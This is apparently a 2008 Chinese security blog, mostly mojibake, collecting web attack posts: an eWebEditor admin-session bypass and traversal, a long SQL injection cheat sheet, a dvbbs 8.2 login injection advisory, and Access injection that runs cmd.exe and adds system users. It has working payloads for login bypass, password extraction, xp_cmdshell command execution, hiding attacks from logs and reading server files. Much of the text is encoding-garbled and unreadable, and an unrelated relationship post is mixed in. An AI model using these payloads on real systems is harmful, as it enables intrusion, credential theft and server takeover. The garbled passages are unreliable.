�º��'Blog

EwebEdit

ItPro — Sat, 19 Jul 2008 16:04:35 +0800

eWebEditor��߱༭��
©��ļ�:Admin_Private.asp
©��:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

ֻ�ж��session��û��ж�cookies��·��֤��⡣
©��:
�½�һ��h4x0r.asp��:
<%Session("eWebEditor_User") = "11111111"%>
��h4x0r.asp��ٷ��ʺ�̨�κ��ļ��for example:Admin_Default.asp

SESSION��ƭ�� SESSION�Ǳ��ڷ��˵� ��ͬCOOKIE ��㱾��Ǹ�SESSION��û��Ч
Ҫ��Ŀ��в�һ��Ҫ��SESSION�ļ��Ŀ��վ��Ŀ¼��

��Ŀ��վ��Aվ Aվ��Bվ��ͬһ��. ��Bվ��WEBSHELL�ֲ��ֱ�ӿ�Ŀ¼��Aվ��Ŀ¼.��ʱ��Bվ��WEBSHELL�ﴫSESSION�ļ��Ϳ��ƭ��Aվ��©��̨��

��ǱȽ��õ�

ewebeditor/admin_uploadfile.asp
��˲��ϣ��ɱ��·��©��
ewebeditor/admin_uploadfile.asp?id=14
��id=14��&dir=..
�ټ� &dir=../..
&dir=http://www.****.com/../.. ��վ�ļ��

SQL Injection Referansı

ItPro — Sat, 5 Jul 2008 14:37:42 +0800

Ön Bilgi

Bir çok teknik sadece SQL Server�� da çal??acakt?r.

Referans

��--�� SQL C��mleci?ini sonland?r?r (bu sayede arkadan gelen c��mlecik handle edilmek zorunda kalmaz)
��;�� ?kinci SQL c��mleci?inin çal??mas?na izin verir

Login Screen

Login olabilme
- admin�� C
- �� or 1=1��
- ...
Farkl? bir kullan?c? olarka login olma
- �� union select 1, ��diger_user��, ��birseyler_sifre��, 1--

Hatalardan ?lerleme (yap?y? olu?turma I)

S?ras?yla..

�� having 1=1 �C
�� group by hatadangelen.id having 1=1��
�� group by hatadangelen.id, gelenikinci.id, ��ç��nc��.id having 1=1��(böyle gider)
Hata almay? bitirince tablo bitti demektir.
Ek olarak order by ile de union da kaç kolon çekildi?i bulunabilir.
- ORDER BY 1��
- ORDER BY 2��

c. �� bu ?ekilde ilerlenir. Hata verdi?i yer �C 1 çekilen kolon say?s?n? gösterir.

Data Tiplerini Bulma (yap?y? olu?turma II)

Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records with distinct.
�� union select sum(tipibulunacakalan) from users��
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
Hata kodu bize verdi?imiz alanin varchar oldu?unu söyledi.
E?er hata kodu union i?lemi ile ilgiliyse yada hata gelmiyorsa verdi?imiz alan numeric demektir.
Union i?lemlerde NULL kullan?labilir date, integer, string in 3 tipinde de bu geçerli sonuç verecektir.
- 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 �C-
  No Error - Syntax is right. MS SQL Server Used. Proceeding.
- 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 �C-
  No Error �C First column is an integer.
- 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 �C-
  Error! �C Second column is not an integer.
- 11223344) UNION SELECT 1,��2��,NULL,NULL WHERE 1=2 �C-
  No Error �C Second column is a string.
- 11223344) UNION SELECT 1,��2��,3,NULL WHERE 1=2 �C-
  Error! �C Third column is not an integer. ...
Convert ve Errorlar ile field tipi bulma - convert(image,1)
- SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL��
- Microsoft OLE DB Provider for SQL Server error '80040e07'
  Explicit conversion from data type int to image is not allowed.
- You��ll get convert() errors before union target errors ! So start with convert() then union

Data Ekleme

'; insert into users values( 666, 'attacker', 'foobar', 0xffff )��

Sistem Hakk?nda Bilgi Toplama

Data convert i?lemlerinde SQL Server detayl? hata mesajlar? dönd��r��r;

' union select @@version,1,1,1--
SQL Server versiyonunu dönd��recektir. ( Numerik alan ile union edilmeye çal???lmal? ! )

Data Alma

' union select min(username),1,1,1 from users where username > 'admin'--
Users tablosundaki username�� e integerlara uygulanan min() denedi?inden ve string i de çekmi? oldu?undan hata mesaj? olarak çekilmi? olan username gelecektir.
' union select password,1,1,1 from users where username = 'admin'��
Bir önceki i?lemde buldu?u username i direk union ile getiriyor
�� Union All Select 1,1,1,1 FROM SysObjects WHERE ��=��
User defined Tables
SELECT name FROM sysobjects WHERE xtype = ��U��
Field Getirme
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = ��ORDERS��)
Record ilerletme
WHERE users NOT IN (��First User��, ��Second User��)
Record ilerletme 2
Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21

Advanced Yöntemler

T-SQL ile bir tablodaki t��m datay? tek string haline getirip yeni bir temp tabloya insert etmek ve daha sonradan onu almak.

set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo
end

The attacker 'logs in' with this 'username' (all on one line, obviously��)

Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end��
' union select ret,1,1,1 from foo--
convert hatas? alaca??ndan dolay? direk az önce insert edilen stringleri getirir.
Teoriye göre e?er SQL Server Local System Account�� ? ile çal???yorsa regread ile SAM account�� u okunabilir. Default! (xp_regread)
Linked serverlarda query çal??t?r?labilir (openquery)
Custom Stored Procedure�� ler ile SQL Server Process�� i içerisinden exploit yaz?l?p çal??t?rabilir. (sp_addextendedproc)
Bulk Insert ile serverdaki herhangi bir dosya okunabilir
- create table foo( line varchar(8000) )
- bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
- ?imdi data bu yeni tablodan okunabilir, sonrada tablo drop edilebilir
Text dosyas? yazma (BCP �C Login bilgisi gerekli)
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
��sa�� olarak login olduk mu?
if (select user) = 'sa' waitfor delay '0:0:5'
ActiveX deste?inden dolay? scripting kullan?labilir (VBS, WSH)
wscript.shell example
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
SQL Server��? konu?turma (maymunluk olsun diye yap?labilir)
T?rnak Kullanmadan SQL Yazmak
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)
veya sadece numerik de?erler ile data girilebilir

insert into users values( 667, 123, 123, 0xffff)
SQL Server integerlar? otomatik olarak varchar a çeviriyor.
Xx.asp?p=xx��; EXEC master.dbo.xp_cmdshell ��cmd.exe dir c:��

Özel Tablolar

Hata Mesajlar?
select * from master..sysmessages
Linked Serverlar (openquery fonskiyonunu login olmadan kullanilabilir eger ki sp_addlinkedsrvlogin kullan?ld?ysa)
master..sysservers
?ifreler, Loginler
master..sysxlogins

Tablo / Server Modifikasyon

Tablo Silme
'; drop table foo--

Functions

SQL Server�� ? kapa (shutdown)
��; shutdown��
Bekleme (waitfor delay)
Bir ?eyin pasif/gizli olarak çal???p çal??mad???n? anlamak için
waitfor delay '0:0:10'��
kullan?m? çok verimlidir. Belirtilen s��re kadar bekler. Bu sayede çe?itli kontroller yap?labilir yada basitçe harmless bir ?ekilde eklenen SQL c��mleciklerinin gerçekten çal???p çal??mad??? kontrol edilebilir.

Atak Gizleme

SQL Server sp_password içeren SQL Querylerini g��venlik nediyle loglam?yor. Bu durumda her çal??t?r?lan komut ard?ndan ��Csp_password demek onun gizlenmesi için yeterli. Bu sayede bir log olu?sa da içeri?i olu?muyor.

SQL Injection Tespiti

Normalde SQL Injection basit ?ekilde tek t?rnak (��) vs. Koyarak ç?kan hataya göre tespti edilebilir. Ancak baz? uygulamalar? hatalar? gizleyebilir, yada siz arkadaki yada hata oldu?unda direk varsay?landan devam etme gibi özelliklere sahip olabilir. Bunun yan?nda bir di?er kritik sorunsa bir sistemde ne kadar çok hata verdirtirseniz bir analizde o kadar çok takip edilebilirsiniz.

Ek olarak software based server da çal??an web firewall lar? genelde pattern olarak (Snort gibi IDS lerde bu ?ekilde) status code lar?nda ��500�� veya benzer hata kodlar?n? eklerler genelde bir çok ��200�� status kodu dertsiz olarak bu filtreleri geçebilir. Daha sonradan olay?n trace noktas?nda da bu bir kolayl?kt?r.

Bu noktada daha önceden bahsi geçen ��waitfor delay�� kullan??l? bir fonksiyondur. Ek olarak daha da pratik mant?k SQL ��n ayn? i?i yapmas?n? sa?layan queryler olu?turmakt?r, ama tabii ki t?rnak yada SQL de çal??acak fonksiyonlar kullanarak.

product.asp?id=4
- product.asp?id=5-1
- product.asp?id=4 OR 1=1
product.asp?name=Book
- product.asp?name=Bo��+��ok
- product.asp?name=Bo�� || ��ok (ORACLE)
- product.asp?name=Book�� OR ��x��=��x

Stored Procedures

Cmd Execute (xp_cmdshell)
exec master..xp_cmdshell 'dir'
Registry ??lemleri (xp_regread)
Registry�� e yazma okuma vs. ??lemleri.
- xp_regaddmultistring
- xp_regdeletekey
- xp_regdeletevalue
- xp_regenumkeys
- xp_regenumvalues
- xp_regread
- xp_regremovemultistring
- xp_regwrite
  exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
  exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
Servisleri Kontrol Etmek (xp_servicecontrol)
Sistemdeki Medyalar? Görme (xp_availablemedia)
Directory Tree sini alma (xp_dirtree)
ODBC Resourcelar? Listeleme (xp_enumdsn)
Login modeunu bulma (xp_loginconfig)
Cab Ar?iv Olu?turma (xp_makecab)
Domainleri Bulma (xp_ntsec_enumdomains)
PID ile process terminate etme (xp_terminate_process)
Yeni Strored Procedure Ekleme (istenilen kod SQL Server process içerisinde çal??t?r?labilir)
sp_addextendedproc ��xp_webserver��, ��c:\temp\x.dll��
exec xp_webserver
Stored Procedure Silme (sp_dropextendedproc)
D??ar?ya UNC dahil dosya yazma (sp_makewebtask)

Other

OleDB driver ile çal??t?r?lan SQL�� lerde union vs. Ler çal??mayabilir
Execute() ile çal??t?r?lanlar sa?lamd?r

MySQL Injection

After MySQL 4.0 you can ��Union�� queries
For SQL comments use /*mysql comment*/
Unions are just like SQL Server unions same fields, same types required
@@version is available, you can use it in unions
You can hex-encoded strings
- select 'c:/boot.ini'
- or
- select 0x633a2f626f6f742e696e69
MySQL can load DLL and run arbitary code
Subqueries version 4.1+
MySQL Passwords
- In versions prior to 4.1, the password hash can be used to
  authenticate directly with the database. Just recompile MySQL Client to login with hash.
- Other versions use SHA1
- SELECT User,Password FROM mysql.user;
- SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ��root��;

MySQL (Custom) Functions & UDF

substring
- query.php?user=1+union+select+substring(load_file(0x633a2f626f6f742e696e69),60),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
SELECT ... INTO DUMPFILE
- Write query into a new file (can not modify existing file)
UDF Function
- create function LockWorkStation returns integer soname 'user32';
- select LockWorkStation();
- create function ExitProcess returns integer soname 'kernel32';
- select exitprocess();
SELECT USER();
SELECT password,USER() FROM mysql.user;
First byte of admin hash
- SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;

MySQL Samples

UPDATE user
SET Password=PASSWORD('crack')
WHERE user='root';
FLUSH PRIVILEGES;

MySQL Load_File

With unions you can read a file
query.php?user=1+union+select+load_file(0x633a2f626f6f742e696e69),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

MySQL Load Data Infile

By default it��s not avaliable !
- create table foo( line blob );
  load data infile 'c:/boot.ini' into table foo;
  select * from foo;

Timing & Blind MySQL Injection

select benchmark( 500000, sha1( 'test' ) );
query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
Enumeration data, Guessed Brute Force
- select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );

Stored Procedure Injection

E?er SQL bir ?ekilde ASP ile unsafe parametrelerle olu?turulup gönderiliyorsa bu g��venli de?ildir. Stored Procedure olsa bile.
E?er parametrelerde ADO Command gibi bir ?eyler ile gönderiliyorsa ve do?ru implemente edildiyse g��venlidir.
sp_who '1' select * from sysobjects
or
sp_who '1'; select * from sysobjects

Second Order SQL Injection

Zor bir metod, temel olarak arda arda birbirinin datas?n?n kullanan SQL�� lerde kullan?labilir. Temel bo?luk bu tip yerlerde ikinci SQL birinci SQL den datay? ald???ndan ona göz�� kapal? g��venmesidir yani gelen data kullan?c?dan de?il de aplikasyondan geldi?inden tekrar kontrol edilmez genelde.

Bir sistemde yeni kullan?c? ?u ?ekilde olu?turulur;
Username: admin'--
Password: password
Bu ?u Insert�� i çal??t?r?r;
insert into users values( 123, 'admin''--', 'password', 0xffff )
?ifre de?i?tirme ekran?ndaki durum ?u ?ekilde olacakt?r;
Kontrol;
var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";
?ifre Update i?lemi;
sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"
Bu ad?mda bir önceki SQL dönen username direk kulland???nda filtreden geçemeyece?inden direk olarak ?u SQL çal??m?? olacakt?r;
update users set password = 'password' where username = 'admin'--'
Bu da admin ?ifresinin istenilen ?ifreye de?i?tirecektir.

Second Order Insert SQL Injection

Form dolurulurken ?u ?ekilde doldurulur;

Name : �� + (SELECT TOP 1 password FROM users ) + ��

΢��3��SQL Injection��⹤��

ItPro — Fri, 27 Jun 2008 08:01:54 +0800

�� SQL INJECTION ��࣬΢��շ��ѹ��ߣ��վ��Ա�ͼ��ڵķ��ղ��Կ��ܵĹ��ء�

Scrawlr
��ص�ַ��https://download.spidynamics.com/Products/scrawlr/

��΢�� HP��Ĺ��ߣ��վ��У��ҳ�Ĳ�ѯ�ַ��з��е� SQL INJECTION ��ա�Scrawlr ʹ��˲�� HP WebInspect ��ͬ�ļ��ֻ�� SQL INJECTION ��ա�Scrawlr ��һ��ʼ URL ��ڣ��վ��վ��ҳ��з��ҵ��ܴ��ڵ�©��

Microsoft Source Code Analyzer for SQL Injection
��ص�ַ��http://www.microsoft.com/downloads/details.aspx?FamilyId=58A7C46E-A599-4FCB-9AB4-A4334146B6BA&displaylang=en

���� MSCASI �Ĺ��߿��Լ�� ASP ��벢��е� SQL INJECTION ©��ASP �� SQL INJECTION ©��ƣ��Ҫ�� MSCASI �ṩԭʼ��룬MSCASI ��ҵ��ڷ��յĴ��λ�á�

URLScan 3.0
��ص�ַ��http://www.iis.net/downloads/default.aspx?tabid=34&g=6&i=1697

�ù��߻�� IIS ��ĳЩ��͵� HTTP ��ͨ��ض� HTTP ��ƣ��Է�ֹĳЩ�к��ڷ��ִ�С�UrlScan ͨ��һϵ�йؼ��ʷ��ֶ��󣬲��ֹ��ִ��

MSSQL 2005 LOG��webshell

ItPro — Wed, 11 Jun 2008 15:52:27 +0800

ע:ת�ؾ�ע��'�¹��Ӳ��'ԭ��

http://itpro.blog.163.com

��λ��վ��ѡ��ǲ��Ǹо��mssql2000һ��ֶ��mssql2005�ˣ�Ŀǰ��ϴ��log��ݺͲ��챸�ݶ��sql2000��ݿ��ġ��ô��2005��ݿ��ô��ء��ü��밴��·�ʽ��õ�webshell��by:�º�� qq:393214425

��һ��

��
)--

��岽
)--

��߲�
]--

�ھŲ�

��͵��Ϊ�ԡ�Ů��͵��Ϊɶ��

ItPro — Thu, 5 Jun 2008 09:56:04 +0800

��ϼ��һ�仰��еĻ��У��͵�飬Ŀ��Ϊ�ԣ�Ů��͵��齻�ڡ�͵��˵��͵�ľ��͵�ģ�͵��Ժ�㲻��ô��ϧ�ˡ��Ů��λ��ϣ��ӵ��͵�Ķ��

һ��һ��Ů�˲��ر��У��ô��տ�ʼ��ʱ�򣬽��ܵ��ϰ��Ӿ��ˣ��Ļ��뵽��εõ��塣��Ů��أ��ʼ�ĸ��Ҳ�Ǵ��ϰ��ʼ�ģ��Ĵ��Լ��ֿ�Ķ��

��˵õ�Ů�˺󣬻��ۣ��Ϊ��˵��ֺ��鿪ʼ��䣬��Ů�˵İ��о��ոտ�ʼ��

��ν��Ե��Ů��쳤�ؾá��ֿ��һ��Ե��Ů��һ��Ե��ĥ��

��һ��Ů�˿��Լ��°��ȥ��һ��ȥ�İ��飬��ô��δ��̫�߹��˶��˿��Գ��õ��Ľһ��Ů�ˣ��Ϊ��Ů��ϰ��Ŀ��°���Ͼ��˵��ȡ�ı��Ǹı䲻�˵ġ�

��Դ��Ů��˼��ƽӹŮ��˼����Ů��°��˼��

��˵�˵�һ��Ҫ��˲��ļ�ס�˰��顣��Ȼ��ˣ��Ͳ��ó��Ƿ�ʹ��ȥ�廳��ʣ�µľ��ʱ�䣬��ĵĵȴ��Ǽ��ֵ��Ҳ��ǲ��İ��飡��Ĺ��£��ǧ��ס��飬��ϰ��ʼ��

��Ե��Ů�˿̹��ġ��ʧ�Լ��Ů��Ϊ�˰��ķ�²��κ��Ҳ�ı䲻��Ϊū��ˡ�Ϊ��飬Ů�˸�Ը��ţ��Ů�˶�ϣ��˶��Ǻã��õĵı�׼��Ե�ͳһ��

��Ů��Ϊ̫��Բ��˷��ϣ��Ǳ��į��ĵ�Ů��ʹ��֪��ĵ��˺��һ��ֵ��ѣҫ��

Ů��û�а��ʱ��Լ��˷ѣ��´��ĺ�ʱ�⣬��þɲŶ��ð��鲻��Ǵ��һ��Ǹ��ȥ��˲��Ǹ��ײ��ˣ��Ǻ�ڣ��Ǿͺޡ�

Ů��ȥ��˺��Բɻ�ժ�ݵ��ȥ��µ�Ŀ��Ժ��ˣ��˵��Ǻ��顣

��ʼ��˽��ѡ��Լ��ѡ��Ҳ��ǹ�ȥ��¡�˭��Ϊ�˰ٷְٵİ��ǧ��֮ǧ��أ��Ƕ��ڳ��Ů��˵��ܿ��̵��顣��Ů�˵Ĵ�С�Ů��Ǳ��ģ��յ�Ů��һ��Ϊ��ȫ��һҹ֮�仯��Ӱ֮�󣬾ͻ��һ�־��ı�̬�ı��

��ЩɵŮ�ˣ��Լ��ȥ��ס��ЩŮ��ȥ��ס��Ů�˶�ʧ��ˡ��˽��һ��Ů�˵Ŀ�ʼ��Ϊ��ϰ��ϲ��Ը��ǻ��ѧʶ��Ĳ�ͬ�ĸ��ܣ��ǵ��û��˾��յ��У��ϰ��˵��֣��°��Ŀ��Ѿ��Į��

dvbbs8.2(access/sql)version login.asp remote sql injection

ItPro — Mon, 2 Jun 2008 08:08:10 +0800

From: <hackerb_at_hotmail.com>
Date: 29 May 2008 10:19:00 -0000

('binary' encoding is not supported, stored as-is) name:
where (topsec security research group)

email:
hackerb_at_hotmail.com

Subject:
dvbbs8.2(access/sql)version login.asp remote sql injection

danger level:
critical/High

info:
dvbbs is prone to multiple sql injection security flaw

interrelated code to access version(exp):
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271

Examples(access version):
decide
Where? and ?1?=?1
where? and ?1?=?2
to get usernamer or password
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1
.......................
.......................
where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1
where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1
......................
......................

Solution:
Authorities patch
dvbbs web site(http://www.dvbbs.net)

References:
dvbbs(http://www.dvbbs.net)
Received on May 29 2008

ACCESS�߼�ע��

ItPro — Tue, 27 May 2008 08:31:57 +0800

��ڽű�ע�빥��ļ��,��õ��ַ��ֺö��,��ͨ��Ӳ�ѯ��Union��ϲ�ѯ��ȡ��һЩ��е��,��Admin,Log��ȵ�,��һ�ִ��Ķ��ݿ�Ĺ��ʽ,��MSSQL Server�ķ��Ϊ��͸��,
��ȡ��Ȩ�޽ϸߵ�ע��ʱ��,��ǿ��MSSQL Server��չ��ִ����ǻ�ȡĿ¼,��ȡ�ļ��޸�ע��;�ڵ�Ȩ�û��У��ò��챸��,
��߸ɴ��ݿ�ȷ�ʽ��ʵ�ֶ�ϵͳ��ֱ�ӹ��Ǽ�ӵĹ��.��Oracle\MySQL\DB2��Щ��MSֱ��֧�ֵ��ݿ��,��Ҳ�ж��ֶ��Ĺ��ַ�,ִ��,��ļ��ȡ�ļ��.
��һЩ��Գ��ݿ�Ĺ��ʽ�Ĵ��ܽ�,��ѿ���ߵ�,Ҫ��Access��ݿ��.һ��Access��,�޷�ֱ�ӻ�ȡ��ݿ��еı��ֶ��,��Access��,��Ķ��ǳ��,
��˵Ҳ��֧�ֶ��SQL�﷨,��T-SQL�ı�׼��в��ٵ��,��˾��Access��ݿ��н��е�Insert,Update,Select,Delte,Produce��Ƕ�SQL��ķ�װ��.��,��Ҫ��Access��о�.
��ƪ�о��ʼ��,��ο��º��,�в��nsfocus��xFocus��2000-2002��ĵ�,��һƪ��SuperHei��<��Access��һЩ��>,
��ҿ��http://www.4ngel.net/��ȫ��ʹ��ȫС��վ�ϲ�ѯ��.OK,�ϻ��Ҫ̫��,��Ǽ��о�.
��ǿ��ȥ��΢��ڸ��Ƴ�Windows 2000��ʱ��ֹ��ǳ��Ľű�©��©��棬��б��cateloy_type.asp��Զ��ע��©��Msadscs.dll©��ȶ��漰��ڵĹ��ַ��ǳ��õ��÷��Ϊ��ͬ�ĵط�,
��Catelog_type.asp��ע��©��,��Ĵ��г��ֵ��:
"select * from cateloy where type='" & Requset("Type") & "'"
˭��ܿ��һ��ǳ��ͼ��ע��©��,ֱ�ӽ�Type��ֵ��SQL��в�ѯ,��û�й��Ƶ��û��Ķ��.
��,��ǻ��ֻ��ܱ��,�Һ�MSû��PHP��gpc,��ǽ�һ��޳�.��ǿ��Բ鿴��ƪ©��ϵ��÷�ʽ,��漰��һ��SQL��:
Select * from Sometable where somefield='|Select Shell("cmd.exe /c dir")|'
��Ľ��,��©��˵��,Access��"|"��VBA��,��ִ��,��ʵ��ֻ��Access��õ�һ��⺯��,��ƵĻ��cudir��Command��.��ǿ��Access�в��.��Ե�SQL��:
Select Shell("cmd.exe /c dir c:\ > c:\kevin.txt")
�ص�C��,��ǹ�Ȼ��kevin.txt.˵��ִ�гɹ��.
Ȼ��ǽ��ת��ű��в��԰�.��д��µ�VBS�ű�
Set Conn=Createobject("Adodb.Connection")
Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=kevins4t.mdb"
Set Rs=Conn.execute("Select Shell(""cmd.exe /c dir c:\ > c:\kevin.txt"")")
Msgbox Rs(0)
��һ�˳��ֵĽ��ܳ��ǵ��,��ԭ��"��ʽ�е�'Shell'��δ��".��Ҫ��ȱ��Ȼ��˼��Ϊʲôͬ��ڲ�ͬ��ִ��߼��˽�Ȼ��ͬ��.һ��ִ��,
��һ��Ҳ��.��΢��һ��е�ʲô�ط��һ��,��ô��Ǿ�ȥ΢��֪ʶ��ȥ�˽�һ��.
��΢��һƪ��ɳ��ģʽ��ĵ��,��˽⵽һЩ��:
Ϊ�˰�ȫ��,MS��Jet��Sp8��,��һ��ΪSandBoxMode�Ŀ��,��ǿ��һЩ��⺯��ִ��ִ�е�Ȩ�޵�.��ע��λ��
HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode��,Ĭ��2.΢��ֵ�Ľ��Ϊ:0Ϊ��κ��ж��ֹ��ð�ȫ��,1Ϊ��ķ�Χ֮��,
2��Ǳ��Access��ģʽ��(��Ϊʲô��Access��ִ�гɹ��ԭ��.),3��ȫ��,��Access��Ҳ��֧��.
��ô�ð�,��ֵ��Ϊ0��.
��ǵ�VBS��ʱ��,��ֵ��һ��,��C��²鿴�ļ�,��Ȼ��ǵ�kevin.txt.��.ԭ��AccessҲ�ǿ��ִ��,ֻ��΢��һ��˵��.��ʵ�ʷ��?
һ.��ŵ��
��ǵ��ý��խ.��,һ��Ҫ��Ȩ�޺ܸ�,��Ҫ��ܸ�ע��Ȩ��,Ĭ��Admin��LocalSystem,��ǽ��޸�ע��Զ��?û�ŵ�.��ֻ�ý��䵱��һ��.
ֻҪ��޸��ע��ֵ,��ô��ͨ��ע��,��һ��ܲ��ĺ��ŷ�ʽ,��ⲿִ��һЩСС��ʲô��.
��͸ĳ��վ��ʱ��õ��Ȩ��,��޸��SandBoxMode,֮��Ǳ��Աɨ�س��.��ô,��ҳ��ĳ��ط��ɴ��һ��Select��ע��,��,��÷��ִ��µ�SQL��.
InjectionURL' and 0<>(select shell("cmd.exe /c net user > c:\inetpub\wwwroot\kevins4t.txt"))%00
��ǾͿ��һ��һ��Ľ��·��.
��.Զ�̹��
�⽫��һ��˼�Ļ��.��Ǳ��޸�ע��Ȩ��,��޸�ע��,��ǿ��ִ��SandboxMode�Ļ��,��ͬʱ��,��ʲô��?
��֪��,��ƽʱ��־�Ͽ��,�ܶ��޷Ǿ��һ��Sa��ӵ�InjectionURL�п��,һ��ִ��,��ȥ��չ��ǽ��չ��Ҫ��DLL��,��ǽ�һ��.��ô��Ƿ��뵽�˷��?
��֪��,ֻ��Sa��Ȩ�޲��п��ȥ��һ��Access��ӵ�,��˴�Access��ͬʱ,��Ҳ��޸�ע��Ȩ��,��ΪMSSQL��һ��Ϊxp_regwrite��չ,��޸�ע��ֵ.�﷨��
exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value
��ֻҪ��SandBoxMode�޸�Ϊ0��1�ͳɹ��.Ȼ��MSSQL��OpenRowSet��,��ڴ�һ��ݿ��ӵ��һ��ݿ�֮��.��Ǿ߱�SysAdmin��Ȩ�޵�ʱ��,��ǾͿ��Jet��.��ô��ֻҪ��ӵ�һ��Access��ݿ��,
Ȼ��ִ��Ϳ��.��ǹؼ��Ѱ��Access��ݿ�.
��ǰ��˺ܶ�,һ��ʼ��,��Ŀ¼��ѯ��ݿ��λ��.��ַ��ɹ��ʲ��ܸ�,�е�ʱ��ܶ��վ�㶼��˷ǳ��õ�Ȩ��,�޷��ҵ�MDB��ݿ�.��Ϊ��յĵط�.
��뵽��һЩǰ��ù��ķ�ʽ,ϵͳ�ﱾ��2-3��ִ��ݿ��,�αط��ȥ��?��ǵ�λ��%windir%\system32\ias\ias.mdb��%windir%\system32\ias\dnary.mdb��һ��,��ִ��,��ûʲô��µ��.ִ��һ��Ҫ��
InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user kevin 1986 /ad")');--
��,��Ǿ�ִ��.��Ҽ̳е��MSSQL��LocalService��SystemȨ��.

--------------------------------------------------------------------------------------------------------------------------------------------------------

�û��
SELECT Name FROM msysobjects WHERE Type = 1 and flags=0
��б�
SELECT Name FROM msysobjects WHERE Type = 1

�жϰ汾��
SELECT NULL FROM MSysModules2 '97
SELECT NULL FROM MSysAccessObjects '97 2000
SELECT NULL FROM MSysAccessXML '2000 2002-2003
SELECT NULL FROM MSysAccessStorage '2002-2003 2007

SandBoxMode:
SandBoxMode�Ŀ��,��ǿ��һЩ��⺯��ִ��ִ�е�Ȩ�޵�.��ע��λ��
HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode��,Ĭ��2.
΢��ֵ�Ľ��Ϊ:0Ϊ��κ��ж��ֹ��ð�ȫ��,1Ϊ��ķ�Χ֮��,
2��Ǳ��Access��ģʽ��(��Ϊʲô��Access��ִ�гɹ��ԭ��.),3��ȫ��,��Access��Ҳ��֧��.

ִ��
Select Shell("cmd.exe /c dir c:\ > c:\kevin.txt")

��ļ�
SELECT * FROM [TEXT;DATABASE=c:\;HDR=NO;FMT=Delimited].[kevin.txt]

д�ļ��Ӳ�ѯ��UNION��ѯ�У�ʵ�ü�ֵ��
SELECT "text to write" into [TEXT;DATABASE=c:\;HDR=NO;FMT=Delimited].[kevin1.txt]

��ǰ·��sandboxing enable
select curdir() from msysaccessobjects
select dir('c:\ ') from msysaccessobjects
select environ(1) from msysaccessobjects
select filedatetime('c:\boot.ini') from msysaccessobjects
select filelen('c:\boot.ini') from msysaccessobjects
select getattr('c:\ ') from msysaccessobjects
select shell('cmd.exe /c dir c:\ > c:\kevin.txt') from msysaccessobjects

��ļ��ѯ��
SELECT * FROM dv_address IN 'D:\dailian\bbs\Dvbbs8.2.0_Ac\Data\IPaddress.mdb'

��MSSQL:
SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=(local);UID=sa;PWD=2853wang; DATABASE=master].Information_Schema.Tables

�ο��ϣ�
http://www.tr4c3.com/SecDocs/ACCESS%20THROUGH%20ACCESS.pdf

Access SQLע��ο�

ItPro — Tue, 27 May 2008 08:27:11 +0800

Access SQLע��ο�

�汾 0.2.1
(�� 10/10/2007)
��ħɵ��

��

